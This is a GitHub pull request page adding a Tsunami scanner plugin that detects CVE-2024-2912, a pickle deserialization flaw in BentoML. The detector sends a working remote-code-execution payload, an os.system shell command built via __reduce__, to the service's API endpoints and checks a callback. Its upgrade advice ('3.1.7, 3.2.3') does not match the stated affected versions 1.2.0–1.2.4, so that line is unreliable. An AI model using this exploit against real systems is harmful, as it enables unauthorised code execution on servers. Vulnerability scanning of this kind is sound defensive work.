Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Feat: add bentoml insecure deserlization plugin #520

Merged
merged 9 commits into from
Oct 23, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
227 changes: 227 additions & 0 deletions py_plugins/bentoml_deserialization_rce/bentoml_rce_detector.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,227 @@
# Copyright 2024 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Tsunami plugin for detecting CVE-2024-2912."""
from absl import logging
from common.data import network_endpoint_utils
from common.data import network_service_utils
from common.net.http.http_client import HttpClient
from common.net.http.http_headers import HttpHeaders
from common.net.http.http_request import HttpRequest
from google.protobuf import timestamp_pb2
from plugin.payload.payload_generator import PayloadGenerator
import detection_pb2
import payload_generator_pb2 as pg
import pickle
import plugin_representation_pb2
import time
import tsunami_plugin
import vulnerability_pb2

_VULN_DESCRIPTION = (
'The BentoML framework is vulnerable to an insecure deserialization issue that can'
secureness marked this conversation as resolved.
Show resolved Hide resolved
' be exploited by sending a single POST request to any valid endpoint. '
'The impact of this is remote code execution.'
'The affected versions are between 1.2.0 and 1.2.4.'
)
_SLEEP_TIME_SEC = 20


class Cve20242912Detector(tsunami_plugin.VulnDetector):
"""A TsunamiPlugin that detects RCE on the BentoML target."""

def __init__(
self, http_client: HttpClient, payload_generator: PayloadGenerator
):
self.http_client = http_client
self.payload_generator = payload_generator

def GetPluginDefinition(self) -> tsunami_plugin.PluginDefinition:
"""Defines the PluginDefinition for Cve20242912Detector.

Returns:
The PluginDefinition used for the Tsunami engine to identify this plugin.
"""
return tsunami_plugin.PluginDefinition(
info=plugin_representation_pb2.PluginInfo(
type=plugin_representation_pb2.PluginInfo.VULN_DETECTION,
name='Cve20242912VulnDetector',
version='1.0',
description=_VULN_DESCRIPTION,
author='secureness ([email protected])',
)
)

def Detect(
self,
target: tsunami_plugin.TargetInfo,
matched_services: list[tsunami_plugin.NetworkService],
) -> tsunami_plugin.DetectionReportList:
"""Run detection logic for the BentoML target.

Args:
target: TargetInfo about BentoML Insecure Deserialization.
matched_services: A list of network services whose vulnerabilities could
be detected by this plugin. "ppp" for example would be on this list.

Returns:
A tsunami_plugin.DetectionReportList for all the vulnerabilities of the
scanning target.
"""
logging.info('Cve20242912Detector starts detecting.')
vulnerable_services = [
service for service in matched_services if
self._IsSupportedService(service) and self._IsBentoMlWebService(service)
]

return detection_pb2.DetectionReportList(
detection_reports=[
self._BuildDetectionReport(target, service)
for service in vulnerable_services
if self._IsServiceVulnerable(service)
]
)

def _IsSupportedService(
self, network_service: tsunami_plugin.NetworkService
) -> bool:
"""Check if network service is a web service or an unknown service."""
return (
not network_service.service_name
or network_service_utils.is_web_service(network_service)
or network_service_utils.get_service_name(network_service) == 'unknown'
or network_service_utils.get_service_name(network_service) == 'ppp'
)

def _IsBentoMlWebService(
self, network_service: tsunami_plugin.NetworkService
) -> bool:
"""Check if this web service is a BentoML web application."""
url = self._BuildUrl(network_service, "/")
request = (
HttpRequest.get(url)
.with_empty_headers()
.build()
)
try:
response = self.http_client.send(request, network_service)
return "<title>BentoML Prediction Service</title>" in response.body_string()
except Exception: # pylint: disable=broad-exception-caught
logging.exception('Unable to query %s', url)
return False

def _IsServiceVulnerable(
self, network_service: tsunami_plugin.NetworkService
) -> bool:
"""Check if network service may result in RCE."""

# find an endpoint with "Service APIs" tag
paths_and_methods = []
url = self._BuildUrl(network_service, "docs.json")
request = (
HttpRequest.get(url)
.with_empty_headers()
.build()
)
try:
response = self.http_client.send(request, network_service)
for path_name in response.body_json()["paths"]:
for http_method in response.body_json()["paths"][path_name]:
for tags in response.body_json()["paths"][path_name][http_method]["tags"]:
if tags == "Service APIs":
paths_and_methods.append([path_name, http_method])
except Exception: # pylint: disable=broad-exception-caught
logging.exception('Unable to query %s', url)

if len(paths_and_methods) == 0:
# there are no Service APIs to exploit
return False

config = pg.PayloadGeneratorConfig(
vulnerability_type=pg.PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE,
interpretation_environment=pg.PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL,
execution_environment=pg.PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT,
)
payload = self.payload_generator.generate(config)
if not payload.get_payload_attributes().uses_callback_server:
return False

class Payload(object):
def __reduce__(self):
import os
return os.system, (f'/bin/sh -c "{payload.get_payload()}"',)

rce_command = pickle.dumps(Payload())
responses_body = []
for path_and_method in paths_and_methods:
url = self._BuildUrl(network_service, path_and_method[0])
request = (
HttpRequest.builder().set_method(path_and_method[1].upper()).set_url(url)
.set_headers(
HttpHeaders.builder()
.add_header("Content-Type", "application/vnd.bentoml+pickle")
.build()
)
.set_request_body(rce_command)
.build()
)
try:
response = self.http_client.send(request, network_service)
responses_body.append(response.body)
except Exception: # pylint: disable=broad-exception-caught
logging.exception('Unable to query %s', url)
time.sleep(_SLEEP_TIME_SEC)
for response_body in responses_body:
if payload.check_if_executed(response_body):
return True
return False

def _BuildUrl(self, network_service: tsunami_plugin.NetworkService, vulnerable_path) -> str:
"""Build the vulnerable target path for RCE injection."""
if network_service_utils.is_web_service(network_service):
url = network_service_utils.build_web_application_root_url(
network_service
)
else:
url = 'http://{}/'.format(
network_endpoint_utils.to_uri_authority(
network_service.network_endpoint
).strip("/")
)
return url + vulnerable_path.strip("/")

def _BuildDetectionReport(
self,
target: tsunami_plugin.TargetInfo,
vulnerable_service: tsunami_plugin.NetworkService,
) -> detection_pb2.DetectionReport:
"""Generate the detection report for all vulnerability findings."""
return detection_pb2.DetectionReport(
target_info=target,
network_service=vulnerable_service,
detection_timestamp=timestamp_pb2.Timestamp().GetCurrentTime(),
detection_status=detection_pb2.DetectionStatus.VULNERABILITY_VERIFIED,
vulnerability=vulnerability_pb2.Vulnerability(
main_id=vulnerability_pb2.VulnerabilityId(
publisher='TSUNAMI_COMMUNITY', value='CVE_2024_2912'
),
severity=vulnerability_pb2.Severity.CRITICAL,
title=(
'BentoML Insecure Deserialization RCE (CVE-2024-2912)'
),
recommendation=(
'Users of affected versions should upgrade to 3.1.7, 3.2.3.'
),
description=_VULN_DESCRIPTION,
),
)
Loading